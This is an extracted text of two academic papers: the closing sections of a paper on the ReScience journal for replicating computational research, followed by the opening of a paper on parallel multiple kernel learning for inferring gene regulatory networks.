neurobiologist colleagues. When we arrived in our new lab, the model had just been published (2013) but the original author had left the lab a few months before our arrival. There was no public repository nor version control, and the paper describing the model was incomplete and partly inaccurate. We managed to get our hands on the original sources (6,000 lines of Delphi) only to realize we could not compile them. It took us three months to replicate it using 250 lines of Python. But at this time, there was no place to publish this kind of replication to share the new code with colleagues. Since then, we have refined the model and made new predictions that have been confirmed. Our initial replication effort really gave the model a second life. (Viejo, Girard & Khamassi, 2016) Replicating previous work is a relatively routine task every time we want to build a new model: either because we want to build on this previous work, or because we want to compare our new model to it. We also give replication tasks to M.Sc. students every year, as projects. In all these cases, we are confronted with incomplete or inaccurate model descriptions, as well as with the impossibility to obtain the original results. Contacting the original authors sometimes solves the problem, but not so often (because of the dog ate my hard drive syndrome). We thus accumulate knowledge, internal to the lab, about which model works and which doesn’t, and how a given model has to be parameterized to really work. Without any place to publish it, this knowledge is wasted. 
Publishing it in ReScience, opening the discussion publicly, will be a progress for all of us. ReScience is an openly-peer-reviewed journal that targets computational research and encourages the explicit replication of already published research. In order to provide the largest possible benefit to the scientific community, replications are required to be reproducible and open-source. In two years of existence, 17 articles have been published and 4 are currently under review (#20, #39, #41, #43). The editorial board covers a wide range of computational sciences (see http://rescience.github.io/board/) and more than 70 volunteers have registered to be reviewers. The scientific domains of published work Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 6/17 https://peerj.com https://github.com/ReScience/ReScience-submission/pull/20 https://github.com/ReScience/ReScience-submission/pull/27 https://github.com/ReScience/ReScience-submission/pull/30 https://github.com/ReScience/ReScience-submission/pull/30 http://rescience.github.io/board/ http://dx.doi.org/10.7717/peerj-cs.142 are computational neuroscience, neuroimaging, computational ecology and computer graphics, with a majority in computational neuroscience. The most popular programming languages are Python and R. The review process takes about 100 days on average and involves about 50 comments. There is a strong bias towards successful replication (100%); experience has taught us that researchers are reluctant to publish failed replications, even when they can prove that the original work is wrong. For young researchers, there is a social/professional risk in publishing articles that show results from a senior researcher to be wrong. Until we implement a certified anonymized submission process, this strong bias will most likely remain. One of the specificities of the ReScience journal is a publishing chain that is radically different from any other traditional scientific journal, since ReScience lives on GitHub, a platform originally designed for collaborative software development. A ReScience submission is treated very similarly to a contribution to an Open Source software project. One of the consequences is that the whole process, from submission via reviewing to publication, is open for anyone to see and even comment on. Each submission is considered by a member of the editorial board, who may decide to reject the submission if it does not respect the formal publication criteria of ReScience. A submission must contain • a precise reference to the work being replicated, • an explanation of why the authors think they have replicated the paper (same figures, same graphics, same behavior, etc.) or why they have failed, • a description of any difficulties encountered during the replication, • open-source code that produces the replication results, • an explanation of this code for human readers. A complete submission therefore consists of both computer code and an accompanying article, which are sent to ReScience in the form of a pull request (the process used on GitHub to submit a proposed modification to a software project). Partial replications that cover only some of the results in the original work are acceptable, but must be justified. If the submission respects these criteria, the editor assigns it to two reviewers for further evaluation and tests. 
The reviewers evaluate the code and the accompanying material in continuous interaction with the authors through the discussion section until both reviewers consider the work acceptable for publication. The goal of the review is thus to help the authors meet the ReScience quality standards through discussion. Since ReScience targets replication of already published work, the criteria of importance or novelty applied by most traditional journals are irrelevant. For a successful submission (i.e., partial or full replication) to be accepted, both reviewers must consider it reproducible and a valid replication of the original work. As we explained earlier, this means that the reviewers • are able to run the proposed implementation on their computers, • obtain the same results as indicated in the accompanying paper, Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 7/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 • consider these results sufficiently close to the ones reported in the original paper being replicated. For a failure to replicate submission to be accepted, we require extra steps to be taken. In addition to scrutiny of the submission by reviewers and editors, we will try to contact the authors of the original research, and issue a challenge to the community to spot and report errors in the new implementation. If no errors are found, the submission will be accepted and the original research will be declared non-replicable. Since independent implementation is a major feature of replication work, ReScience does not allow authors to submit replications of their own research, nor the research of close collaborators. Moreover, replication work should be based exclusively on the originally published paper, although exceptions are admitted if properly documented in the replication article. Mistakes in the implementation of computational models and methods are often due to biases that authors invariably have, consciously or not. Such biases will inevitably carry over to a replication. Perhaps even more importantly, cross-fertilization is generally useful in research, and trying to replicate the work of one’s peers might pave the way for a future collaboration, or may give rise to new ideas as a result of the replication effort. LESSONS LEARNED Although ReScience is still a young project, the submissions handled so far already provide valuable experience concerning the reproducibility and replicability of computational work in scientific research. Short-term and long-term reproducibility While some of the reasons for non-reproducibility are specific to each scientific domain, our experience has shown that there are also some common issues that can be identified. Missing code and/or data, undocumented dependencies, and inaccurate or imprecise description appear to be characteristic of much non-reproducible work. Moreover, these problems are not always easy to detect even for attentive reviewers, as we discovered when some articles published in ReScience turned out to be difficult to reproduce for someone else for exactly the reasons listed above. ReScience reviewers are scientists working in the same domain as the submitting authors, because familiarity with the field is a condition for judging if a replication is successful. But this also means that our reviewers share a significant common background with the authors, and that background often includes the software packages and programming languages adopted by their community. 
In particular, if both authors and reviewers have essential libraries of their community installed on their computers, they may not notice that these libraries are actually dependencies of the submitted code. While solutions to this problem evidently exist (ReScience could, for example, request that authors make their software work on a standard computational environment supplied in the form of a virtual machine), they represent an additional effort to authors and therefore discourage them from submitting replication work to ReScience. Moreover, the evaluation of de-facto reproducibility (‘‘works on my machine’’) Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 8/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 by reviewers is useful as well, because it tests the robustness of the code under small variations in the computational environments that are inevitable in real life. Our goal is to develop a set of recommendations for authors that represent a workable compromise between reproducibility, robustness, and implementation effort. These recommendations will evolve over time, and we hope that with improving technology we will ultimately reach full reproducibility over a few decades. Another issue with reproducibility is that with today’s computing technology, long- term reproducibility can only be achieved by imposing drastic constraints on languages and libraries that are not compatible with the requirements of research computing. This problem is nicely illustrated by Mesnard & Barba (2017) whose authors report trying to reproduce their own work performed two years earlier. Even though Barba’s group is committed to reproducible research practices, they did not escape the many problems one can face when trying to re-run a piece of code. As a consequence, code that is written for ReScience today will likely cease to be functional at some point in the future. The long-term value of a ReScience publication lies not just in the actual code but also in the accompanying article. The combination of the original article and the replication article provide a complete and consistent description of the original work, as evidenced by the fact that replication was possible. Even 5, 10, or 20 years later, a competent scientist should be able to replicate the work again thanks to these two articles. Of course, the new code can also help, but the true long-term value of a replication is the accompanying article. Open reviewing The well-known weaknesses of the traditional anonymous peer-reviewing system used by most scientific journals have motivated many experiments with alternative reviewing processes. The variant adopted by ReScience is similar to the ones used by F1000Research or PeerJ, but is even more radically open: anyone can look at ReScience submissions and at the complete reviewing process, starting from the assignment of an editor and the invitation of reviewers. Moreover, anyone with a GitHub account can intervene by commenting. Such interventions could even be anonymous because a GitHub account is not required to advertise a real name or any other identifying element. ReScience does currently require all authors, editors, and reviewers to provide real names (which however are not verified in any way), but there are valid reasons to allow anonymity for authors and reviewers, in particular to allow junior scientists to criticize the work of senior colleagues without fear of retribution, and we envisage exploring such options in the future. 
Our experience with this open reviewing system is very positive so far. The exchanges between reviewers and authors are constructive and courteous, without exception. They are more similar in style to a coffee-table discussion than to the judgement/defence style that dominates traditional anonymous reviewing. Once reviewers have been invited and have accepted the task, the editors’ main role is to ensure that the review moves forward, by gently reminding everyone to reply within reasonable delays. In addition, the editors occasionally answer questions by authors and reviewers about the ReScience publishing process. The possibility to involve participants beyond the traditional group of authors, editors, and reviewers is particularly interesting in the case of ReScience, because it can be helpful Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 9/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 to solicit input from the authors of the original study that is being replicated. For example, in one recent case (#28), a reviewer suggested asking the author of the original work for permission to re-use an image. The author intervened in the review and granted permission. Publishing on the GitHub platform GitHub is a commercial platform for collaborative software development based on the popular version control system git. It offers unlimited free use to public projects, defined as projects whose contents are accessible to everyone. All ReScience activities are organized around a few such Open Source projects hosted by GitHub. This is an unusual choice for a scientific journal, the only other journal hosted on GitHub being The Journal of Open Source Software (Smith et al., 2017). In this section, we discuss the advantages and problems resulting from this choice, considering both technical and social issues. There are clear differences between platforms for software development, such as GitHub, and platforms for scientific publishing, such as HighWire. The latter tend to be expensive commercial products developed for the needs of large commercial publishers, although the market is beginning to diversify with products such as Episciences. More importantly, to the best of our knowledge, no existing scientific publishing platform supports the submission and review of code, which is an essential part of every ReScience article. For this reason, the only option for ReScience was to adopt a software development platform and develop a set of procedures that make it usable for scientific publishing. Our experience shows that the GitHub platform provides excellent support for the reviewing process, which is not surprising given that the review of a scientific article containing code is not fundamentally different from the review of code with accompanying documentation. One potential issue for other journals envisaging adoption of this platform is the necessity that submitting authors have a basic knowledge of the version control system Git and of the techniques of collaborative software development. Given the code-centric nature of ReScience, this has not been a major problem for us, and the minor issues have been resolved by our editors providing technical assistance to authors. It is of course possible that potential authors are completely discouraged from submitting to ReScience by their lack of the required technical competence, but so far nobody has provided feedback suggesting that this is a problem. 
The main inconvenience of the GitHub platform is its almost complete lack of support for the publishing steps, once a submission has successfully passed the reviewing process. At this point, the submission consists of an article text in Markdown format plus a set of code and data files in a git repository. The desired archival form is an article in PDF format plus a permanent archive of the submitted code and data, with a Digital Object Identifier (DOI) providing a permanent reference. The Zenodo platform allows straightforward archiving of snapshots of a repository hosted on GitHub, and issues a DOI for the archive. This leaves the task of producing a PDF version of the article, which is currently handled by the managing editor of the submission, in order to ease the technical burden on our authors. A minor inconvenience of the GitHub platform is its implementation of code reviews. It is designed for reviewing contributions to a collaborative project. The contributor submits new code and modifications to existing code in the form of a ‘‘pull request’’, which other Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 10/17 https://peerj.com https://github.com/ReScience/ReScience-submission/pull/28 http://github.com/ https://git-scm.com/ http://home.highwire.org/ https://www.episciences.org/ https://zenodo.org/ http://dx.doi.org/10.7717/peerj-cs.142 project members can then comment on. In the course of the exchanges, the contributor can update the code and request further comments. Once everybody is satisfied, the contribution is ‘‘merged’’ into the main project. In the case of ReScience, the collaborative project is the whole journal, and each article submission is a contribution proposed as a pull request. This is, however, not a very intuitive representation of how a journal works. It would be more natural to have a separate repository for each article, an arrangement that would also facilitate the final publishing steps. However, GitHub does not allow code review on a new repository, only on contributions to an already existing one. Relying on a free-use offer on a commercial platform poses some additional problems for scientific publishing. GitHub can change its conditions at any time, and could in principle delete or modify ReScience contents at any time without prior notice. Moreover, in the case of technical problems rendering ReScience contents temporarily or permanently inaccessible, the ReScience community has no legal claims for compensation because there is no contract that would imply any obligations for GitHub. It would clearly be imprudent to count on GitHub for long-term preservation of ReScience content, which is why we deposit accepted articles on Zenodo, a platform designed for archiving scientific information and funded by research organizations as an element of public research infrastructure. The use of free services provided by GitHub and Zenodo was clearly important to get ReScience started. The incentives for the publication of replication work being low, and its importance being recognized only slowly in the scientific community, funding ReScience through either author page charges or grants would have created further obstacles to its success. A less obvious advantage of not having to organize funding is that ReScience can exist without being backed by any legal entity that would manage its budget. 
This makes it possible to maintain a community spirit focused on shared scientific objectives, with nobody in a position to influence ReScience by explicit or implicit threats of reducing future funding. OUTLOOK Based on our experience with the ReScience initiative, we can engage in informed speculation about possible future evolutions in scientific publishing, in particular concerning replication work. We will not discuss minor technical advances such as a better toolchain for producing PDF articles, but concentrate on long-term improvements in the technology of electronic publishing and, most of all, in the attitude of the scientific community towards the publication, preservation, and verification of computer-aided research. A fundamental technical issue is the difficulty of archiving or accurately describing the software environments in which computational scientists perform their work. A publication should be accompanied by both a human-readable description of this environment and an executable binary form. The human-readable description allows an inspection of the versions of all software packages that were used, for example to check for the impact of bugs that become known only after a study was published. The executable version enables other scientists to re-run the analyses and inspect intermediate results. Ideally, the Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 11/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 human-readable description would permit rebuilding the executable version, in the same way that software source code permits rebuilding executable binaries. This approach is pursued for example by the package manager Guix (Courtés & Wurmus, 2015). A more limited but still useful implementation of the same idea exists in the form of the conda package manager (Anaconda Inc., 2017), which uses a so-called environment file to describe and reconstruct environments. The main limitation compared to Guix is that the packages that make up a conda environment are themselves not reproducible. For example, a conda environment file does not state which compiler versions were used to build a package. Containerization, as implemented e.g., by Docker (Docker Inc., 2017) is currently much discussed, but provides only the executable version without a human-readable description. Moreover, the long-term stability of the container file format remains to be evaluated. History has shown that long-term stability in computing technology is achieved only by technology for which it is a design priority, as in the case of the Java Virtual Machine (Lindholm & Yellin, 1999). Docker, on the contrary, is promoted as a deployment technology with no visible ambition towards archiving of computational environments. Today’s electronic publishing platforms for scientific research still show their origins in paper-based publishing. Except for the replacement of printed paper by a printable PDF file, not much has changed. Although it is increasingly realized that software and data should be integral parts of most scientific publications today, they are at best relegated to the status of ‘‘supplementary material’’, and systematically excluded from the peer review process. In fact, to the best of our knowledge, ReScience is the only scientific journal that aims to verify the correctness of scientific software. As our experience has shown, it is far easier to graft publication onto a software development platform than to integrate software reviewing into a publishing platform. 
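As a concrete (and purely hypothetical) illustration of the human-readable environment description discussed above, a conda environment file for a replication might look as follows; the package names and version pins are invented for this example and are not taken from any ReScience submission:

name: replication-env      # hypothetical environment name
channels:
  - conda-forge
dependencies:
  - python=3.6             # interpreter version pinned for the replication
  - numpy=1.13
  - matplotlib=2.0

Running conda env create -f environment.yml rebuilds an equivalent environment, although, as noted above, the packages it pulls in are themselves not bit-for-bit reproducible.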
Furthermore, tools that will allow for the automated validation of computational models and the automated verification of correctness are being actively developed in the community (see, for example, SciUnit or OSB-model-validation). An integration of such frameworks, which would greatly enhance the verification and validation process, seems feasible for the existing software development platforms. A logical next step is to fully embrace the technology designed for software development, which far better takes into account the specificity of electronic information processing than today's scientific publishing systems. In addition to the proper handling of code, such an approach offers further advantages. Perhaps the most important one is a shift of focus from the paper as a mostly isolated and finished piece of work to scientific progress as a collection of incremental and highly interdependent steps. The Software Heritage project, whose aim is to create a permanent public archive of all publicly available software source code, adopts exactly this point of view for the preservation of software. As our experience with ReScience has shown, integrating the narrative of a scientific article into a framework designed for software development is not difficult at all. Publishing and archiving scientific research in Software Heritage would offer several advantages. The intrinsic identifiers that provide access to the contents of the archive permit unambiguous and permanent references to ongoing projects as well as to snapshots at a specific time, and to whole projects as well as to the individual files that are part of them. Such references hold the promise for better
reuse of scientific information, for better reproducibility of computations, and for fairer attribution of credit to scientists who contribute to research infrastructure. One immediate and legitimate question is to wonder to what extent a replication could be performed prior to the publication of the original article. This would strongly reinforce a claim because a successful and independent replication would be available right from the start. As illustrated in Fig. 1, this would require group A to contact group B and send them a draft of their original work (the one that would normally be submitted to a journal) such that group B could perform a replication and confirm or refute the results. In case of confirmation, a certified article could later be published with both groups as authors (each group being identified according to their respective roles). However, if the replication fails and the original work cannot be fixed, this would prevent publication. This model would improve the quality of computational research and also considerably slow down the rapid pace of publication we are observing today. Unfortunately, such a scenario seems highly improbable today. The pressure to publish is so strong and the incentive for doing replication so low that it would most probably prevent such collaborative work. However, we hope that the current replication crisis will lead to a change in attitude, with an emphasis on the quality rather than the quantity of scientific output, with CoScience becoming the gold-standard approach to quality assurance.

Figure 1. (A) The ReScience publication chain starts from an original research article by authors A, published in a journal, in conference proceedings, or as a preprint. This article constitutes the base material for authors B, who attempt to replicate the work based on its description. Success or failure to replicate is not a criterion for acceptance or rejection, even though failure to replicate requires more precaution to ensure this is not a misunderstanding or a bug in the new code. After review, the replication is published, and feedback is given to the original authors (and editors) to inform them that the work has been replicated (or not). (B) The CoScience proposal would require the replication to happen before the actual publication. In case of failure, nothing will be published. In case of success, the publication will be endorsed by authors A and authors B with identified roles and will be certified as reproducible because it has been replicated by an independent group. (Full-size DOI: 10.7717/peerjcs.142/fig-1)

ADDITIONAL INFORMATION AND DECLARATIONS
Funding
The authors received no funding for this work.
Competing Interests
Federico Vaggi is an employee of Amazon, Inc., Roman Yurchak is an employee of Symerio, and C. Titus Brown and Nicolas P. Rougier are Academic Editors for PeerJ.
Author Contributions
• Nicolas P. Rougier wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, co-founder, editor, author.
• Konrad Hinsen wrote the paper, reviewed drafts of the paper, co-founder, editor.
• Frédéric Alexandre, Alexandra K. Diem, Rafael N. Henriques, Owen Petchey, Frank Stollmeier and Guillaume Viejo reviewed drafts of the paper, author.
• Thomas Arildsen, Pierre de Buyl and Olivia Guest wrote the paper, reviewed drafts of the paper, editor.
• Lorena A. Barba, C. Titus Brown, Timothée Poisot, Karthik Ram and Tiziano Zito reviewed drafts of the paper, editor.
• Fabien C.Y. Benureau, Ozan Caglayan, Andrew P. Davison, Marc-André Delsuc and Etienne Roesch wrote the paper, reviewed drafts of the paper, reviewer.
• Georgios Detorakis, Mehdi Khamassi, Aaron Shifman and Julien Vitay reviewed drafts of the paper, reviewer, author.
• Damien Drix, Pierre Enel, Matt G. Hall, Xavier Hinaut, Kamil S. Jaron, Almar Klein, Tiina Manninen, Pietro Marchesi, Daniel McGlinn, Hans Ekkehard Plesser, Yoav Ram, Cyrille Rossant, Marcel Stimberg, Federico Vaggi, Anya E. Vostinar and Roman Yurchak reviewed drafts of the paper, reviewer.
• Benoît Girard wrote the paper, reviewed drafts of the paper, editor, reviewer, author.
• Christoph Metzner wrote the paper, reviewed drafts of the paper, reviewer, author.
• Vahid Rostami and Joseph Stachelek wrote the paper, reviewed drafts of the paper, author.
Data Availability The following information was supplied regarding data availability: ReScience journal: https://zenodo.org/communities/rescience/. REFERENCES Anaconda Inc. 2017. Conda. Available at https://conda.io/ . Baker M. 2016. 1, 500 scientists lift the lid on reproducibility. Nature 533(7604):452–454 DOI 10.1038/533452a. Colberg C, Proebsting TA. 2016. Repeatability in computer systems research. Communi- cations of the ACM 59(3):62–69 DOI 10.1145/2812803. Coudert F-X. 2017. Reproducible research in computational chemistry of materials. Chemistry of Materials 29(7):2615–2617 DOI 10.1021/acs.chemmater.7b00799. Courtès L, Wurmus R. 2015. Reproducible and user-controlled software environments in HPC with Guix. In: Hunold S, Costan A, Giménez D, Iosup A, Ricci L, Requena MEG, Scarano V, Varbanescu AL, Scott SL, Lankes S, Weidendorfer J, Alexander M, eds. Euro-Par 2015: parallel processing workshops. Lecture notes in computer science, vol. 9523. Cham: Springer. Crook SM, Davison AP, Plesser HE. 2013. 20 years of computational neuroscience. In: Bower MJ, ed. Chap. Learning from the past: approaches for reproducibility in computational neuroscience. New York: Springer New York, 73–102. Davison AP. 2012. Automated capture of experiment context for easier reproducibility in computational research. Computing in Science and Engineering 14:48–56 DOI 10.1109/MCSE.2012.41. Docker Inc. 2017. Docker. Available at https://www.docker.com/ . Donoho DL, Maleki A, Rahman IU, Shahram M, Stodden V. 2009. Reproducible research in computational harmonic analysis. Computing in Science Engineering 11(1):8–18 DOI 10.1109/MCSE.2009.15. Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 15/17 https://peerj.com https://zenodo.org/communities/rescience/ https://conda.io/ http://dx.doi.org/10.1038/533452a http://dx.doi.org/10.1145/2812803 http://dx.doi.org/10.1021/acs.chemmater.7b00799 http://dx.doi.org/10.1109/MCSE.2012.41 https://www.docker.com/ http://dx.doi.org/10.1109/MCSE.2009.15 http://dx.doi.org/10.7717/peerj-cs.142 Guo PJ, Engler D. 2011. CDE: using system call interposition to automatically create portable software packages. In: Proceedings of the 2011 USENIX annual technical conference, USENIX’11. Portland: USENIX Association. Available at http://dl.acm. org/citation.cfm?id=2002181.2002202. Halchenko YO, Hanke M. 2015. Four aspects to make science open ‘‘by design’’ and not as an after-thought. GigaScience 4(1) DOI 10.1186/s13742-015-0072-7. Hinsen K. 2015. Writing software specifications. Computing in Science & Engineering 17(3):54–61 DOI 10.1109/mcse.2015.64. Ioannidis JPA. 2005. Why most published research findings are false. PLOS Medicine 2(8):e124 DOI 10.1371/journal.pmed.0020124. Iqbal SA, Wallach JD, Khoury MJ, Schully SD, Ioannidis JPA. 2016. Reproducible research practices and transparency across the biomedical literature. PLOS Biology 14(1):e1002333 DOI 10.1371/journal.pbio.1002333. Janz N. 2015. Bringing the gold standard into the class room: replication in university teaching. International Studies Perspectives Epub ahead of print Mar 9 2015 DOI 10.1111/insp.12104. Kitzes J, Turek D, Deniz F (eds.) 2017. The practice of reproducible research: case studies and lessons from the data-intensive sciences. Oakland: University of California Press. Lindholm T, Yellin F. 1999. Java virtual machine specification. Second Edition. Boston: Addison-Wesley Longman Publishing Co., Inc. Manninen T, Havela R, Linne M-L. 2017. 
Reproducibility and comparability of com- putational models for astrocyte calcium excitability. Frontiers in Neuroinformatics 11:11 DOI 10.3389/fninf.2017.00011. Mesnard O, Barba LA. 2017. Reproducible and replicable CFD: it’s harder than you think. IEEE/AIP Computing in Science and Engineering 19(4):44–55 DOI 10.1109/mcse.2017.3151254. Munafò MR, Nosek BA, Bishop DVM, Button KS, Chambers CD, Du Sert NP, Simon- sohn U, Wagenmakers E-J, Ware JJ, Ioannidis JPA. 2017. A manifesto for repro- ducible science. Nature Human Behaviour 1(1):0021 DOI 10.1038/s41562-016-0021. Murta L, Braganholo V, Chirigati F, Koop D, Freire J. 2015. noWorkflow: capturing and analyzing provenance of scripts. In: Provenance and annotation of data and processes. Lecture notes in computer science, vol. 8628. Berlin: Springer International Publishing, 71–83. Open Science Collaboration. 2015. Estimating the reproducibility of psychological science. Science 349(6251):aac4716–aac4716 DOI 10.1126/science.aac4716. Perkel J. 2016. Democratic databases: science on GitHub. Nature 538(7623):127–128 DOI 10.1038/538127a. Sandve GK, Nekrutenko A, Taylor J, Hovig E. 2013. Ten simple rules for repro- ducible computational research. PLOS Compututational Biology 9(10):e1003285 DOI 10.1371/journal.pcbi.1003285. Smith AM, Niemeyer KE, Katz DS, Barba LA, Githinji G, Gymrek M, Huff KD, Madan CR, Cabunoc Mayes A, Moerman KM, Prins P, Ram K, Rokem A, Teal TK, Valls Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 16/17 https://peerj.com http://dl.acm.org/citation.cfm?id=2002181.2002202 http://dl.acm.org/citation.cfm?id=2002181.2002202 http://dx.doi.org/10.1186/s13742-015-0072-7 http://dx.doi.org/10.1109/mcse.2015.64 http://dx.doi.org/10.1371/journal.pmed.0020124 http://dx.doi.org/10.1371/journal.pbio.1002333 http://dx.doi.org/10.1111/insp.12104 http://dx.doi.org/10.3389/fninf.2017.00011 http://dx.doi.org/10.1109/mcse.2017.3151254 http://dx.doi.org/10.1038/s41562-016-0021 http://dx.doi.org/10.1126/science.aac4716 http://dx.doi.org/10.1038/538127a http://dx.doi.org/10.1371/journal.pcbi.1003285 http://dx.doi.org/10.7717/peerj-cs.142 Guimera R, Vanderplas JT. 2017. Journal of Open Source Software (JOSS): design and first-year review. ArXiv preprint. arXiv:1707.02264. Stachelek J. 2016. [Re] least-cost modelling on irregular landscape graphs. ReScience 2(1) DOI 10.5281/zenodo.45852. Topalidou M, Leblois A, Boraud T, Rougier NP. 2015. A long journey into repro- ducible computational neuroscience. Frontiers in Computational Neuroscience 9:30 DOI 10.3389/fncom.2015.00030. Topalidou M, Rougier NP. 2015. [Re] interaction between cognitive and motor cortico- basal ganglia loops during decision making: a computational study. ReScience 1(1) DOI 10.5281/zenodo.47146. Viejo G, Girard B, Khamassi M. 2016. [Re] speed/accuracy trade-off between the habitual and the goal-directed process. ReScience 2(1) DOI 10.5281/zenodo.27944. Wilson G. 2016. Software carpentry: lessons learned. F1000Research 3:62 DOI 10.12688/f1000research.3-62.v2. Wilson G, Aruliah DA, Brown CT, Hong NPC, Davis M, Guy RT, Haddock SHD, Huff KD, Mitchell IM, Plumbley MD, Waugh B, White EP, Wilson P. 2014. Best practices for scientific computing. PLOS Biology 12(1):e1001745 DOI 10.1371/journal.pbio.1001745. Rougier et al. (2017), PeerJ Comput. 
Sci., DOI 10.7717/peerj-cs.142 17/17

work_2pr3au7mozfx3bfmyg4bc4yo7u ---- MKL-GRNI: A parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks
Nisar Wani1 and Khalid Raza2
1 Govt. Degree College Baramulla, Jammu & Kashmir, India
2 Department of Computer Science, Jamia Millia Islamia, New Delhi, India
ABSTRACT
High throughput multi-omics data generation coupled with heterogeneous genomic data fusion are defining new ways to build computational inference models. These models are scalable and can support very large genome sizes, with the added advantage of exploiting additional biological knowledge from the integration framework. However, the limitation of such an arrangement is the huge computational cost involved when learning from very large datasets in a sequential execution environment. To overcome this issue, we present a multiple kernel learning (MKL) based gene regulatory network (GRN) inference approach wherein multiple heterogeneous datasets are fused using the MKL paradigm. We formulate the GRN learning problem as a supervised classification problem, whereby genes regulated by a specific transcription factor are separated from other non-regulated genes. A parallel execution architecture is devised to learn a large-scale GRN by decomposing the initial classification problem into a number of subproblems that run as multiple processes on a multi-processor machine. We evaluate the approach in terms of increased speedup and inference potential using genomic data from Escherichia coli, Saccharomyces cerevisiae and Homo sapiens. The results thus obtained demonstrate that the proposed method exhibits better classification accuracy and enhanced speedup compared to other state-of-the-art methods while learning large-scale GRNs from multiple and heterogeneous datasets.
Subjects: Bioinformatics, Computational Biology, Data Mining and Machine Learning
Keywords: Gene regulatory networks, GRN inference, large-scale GRN, Systems biology, Network biology
Submitted 19 October 2020; accepted 29 December 2020; published 28 January 2021. Corresponding author: Khalid Raza, kraza@jmi.ac.in. Academic editor: Othman Soufan. DOI 10.7717/peerj-cs.363. Copyright 2021 Wani and Raza, distributed under a Creative Commons CC-BY 4.0 license.
INTRODUCTION
The problem of understanding gene interactions and their influence through network inference and analysis is of great significance in systems biology (Albert, 2007). The aim of this inference process is to establish relationships between genes and construct a network topology based on the evidence provided by different data types. Among various network inference studies, gene regulatory network inference (GRNI) has remained of particular interest to researchers, with extensive scientific literature generated in this domain. Gene regulatory networks (GRNs) are biological networks where genes serve as nodes and the edges connecting them serve as regulatory relations (Lee et al., 2002; Raza & Alam, 2016). Standard methods for GRN inference such as RELNET
(Butte & Kohane, 1999), ARACNE (Margolin et al., 2006), CLR (Faith et al., 2007), SIRENE (Mordelet & Vert, 2008) and GENIE3 (Huynh-Thu et al., 2010) mostly use transcriptomic data for GRN inference. Among these methods, our approach is modeled along the same principle as SIRENE. SIRENE is a general method to infer unknown regulatory relationships between known transcription factors (TFs) and all the genes of an organism. It uses a vector of gene expression data and a list of known regulatory relationships between known TFs and their target genes. However, integration of this data with other genomic data types such as protein–protein interaction (PPI), methylation expression, sequence similarity and phylogenetic profiles has drastically improved GRN inference (Hecker et al., 2009). A comprehensive list of state-of-the-art data integration techniques for GRN inference has been reviewed in Wani & Raza (2019a). In this article, we aim to integrate gene expression, methylation expression and TF-DNA interaction data using the advanced multiple kernel learning (MKL) library provided by the Shogun machine learning toolbox (Sonnenburg et al., 2010) and design an algorithm to infer gene regulatory networks (GRNs). Besides, we also integrate PPI data and other data such as gene ontology information as sources of prior knowledge to enhance the accuracy of network inference. The problem of network inference is modeled as a binary classification problem whereby a gene being regulated by a given TF is treated as a positive label and negative otherwise. To infer a large-scale network, the MKL model needs to be trained for each TF with a set of known regulations for the whole genome. Given N TFs, we need to train N different classification models individually and then combine the results from these models for a complete network inference task. As the number of TFs increases, the number of classification models also increases, creating resource deficiencies and long execution times for the inference algorithm. The proposed approach attempts to provide a solution to this problem by distributing these classification models to different processors of a multi-processor hardware platform using a parallel processing library from Python. The results from these models are stored in a shared queue object which is later used for network inference. A detailed description of the model is contained in the Methods section.
RELATED LITERATURE
An early attempt to learn and classify gene function from integrated datasets using kernel methods was carried out by Pavlidis et al. (2002). They trained a support vector machine (SVM) for gene function classification with a heterogeneous kernel derived from a combination of two different types of data (e.g., gene expression and phylogenetic profiles).
Since SVM does not learn from multiple kernel matrices simultaneously, they proposed three different ways to fuse two datasets and referred to these fusion methods as (i) early integration, (ii) intermediate integration and (iii) late integration. In early integration, feature vectors from heterogeneous data types are concatenated to build a single, longer vector for a given set of genes. This extended dataset is then transformed into a kernel matrix using an appropriate kernel function and serves as an input to the SVM model, from which biological inferences can be drawn. In the case of intermediate integration, the two datasets are first transformed into their respective kernel matrices; subsequently, these kernel matrices are added together to yield an integrated kernel for SVM training. For late integration, the authors trained the SVM models individually using the heterogeneous datasets; the probability scores, which act as discriminant values obtained from the separate SVM models, are then added together for gene function prediction. In fact, kernel-based methods as effective integration techniques were first proposed by Lanckriet et al. (2004), wherein a 1-norm soft margin SVM is trained for a classification problem separating membrane proteins from ribosomal proteins. They combined heterogeneous biological datasets such as PPI, amino acid sequences and gene expression data characterizing different proteins by transforming them into multiple positive semidefinite kernel matrices using different kernel functions. Their findings reveal an improved classifier performance when all datasets are integrated as a unit compared to testing the classifier on individual datasets. In an earlier study (Lanckriet et al., 2003) on function prediction for baker's yeast proteins, they trained an SVM classifier with multiple datasets of different types and achieved an improved performance over a classifier trained using a single data type. In yet another study on network inference using kernel data integration (Yamanishi, Vert & Kanehisa, 2004), the authors fused four different datasets, namely gene expression data, protein interaction data, protein localization data and data from phylogenetic profiles. These datasets are transformed into different kernel matrices. Datasets comprising gene expression, protein localization and phylogenetic profiles were kernelized using Gaussian, polynomial and linear kernel functions, while graph datasets were kernelized using a diffusion kernel (Kondor & Lafferty, 2002). This study compared both unsupervised and supervised inference methods on single and integrated datasets. To assess the accuracy of the methods, the inferred networks are compared with a gold standard protein network. Contrary to the unsupervised approaches, the supervised approach seems to make interesting predictions and captures most of the information from the gold standard. They observed that data from transcriptomic and phylogenetic profiles seem to contribute an equal quantum of information, followed by noisy PPI and localization data. Applying a supervised approach to integrated datasets seems to produce the overall best results, therefore highlighting the importance of guided network inference from integrated prior biological knowledge.
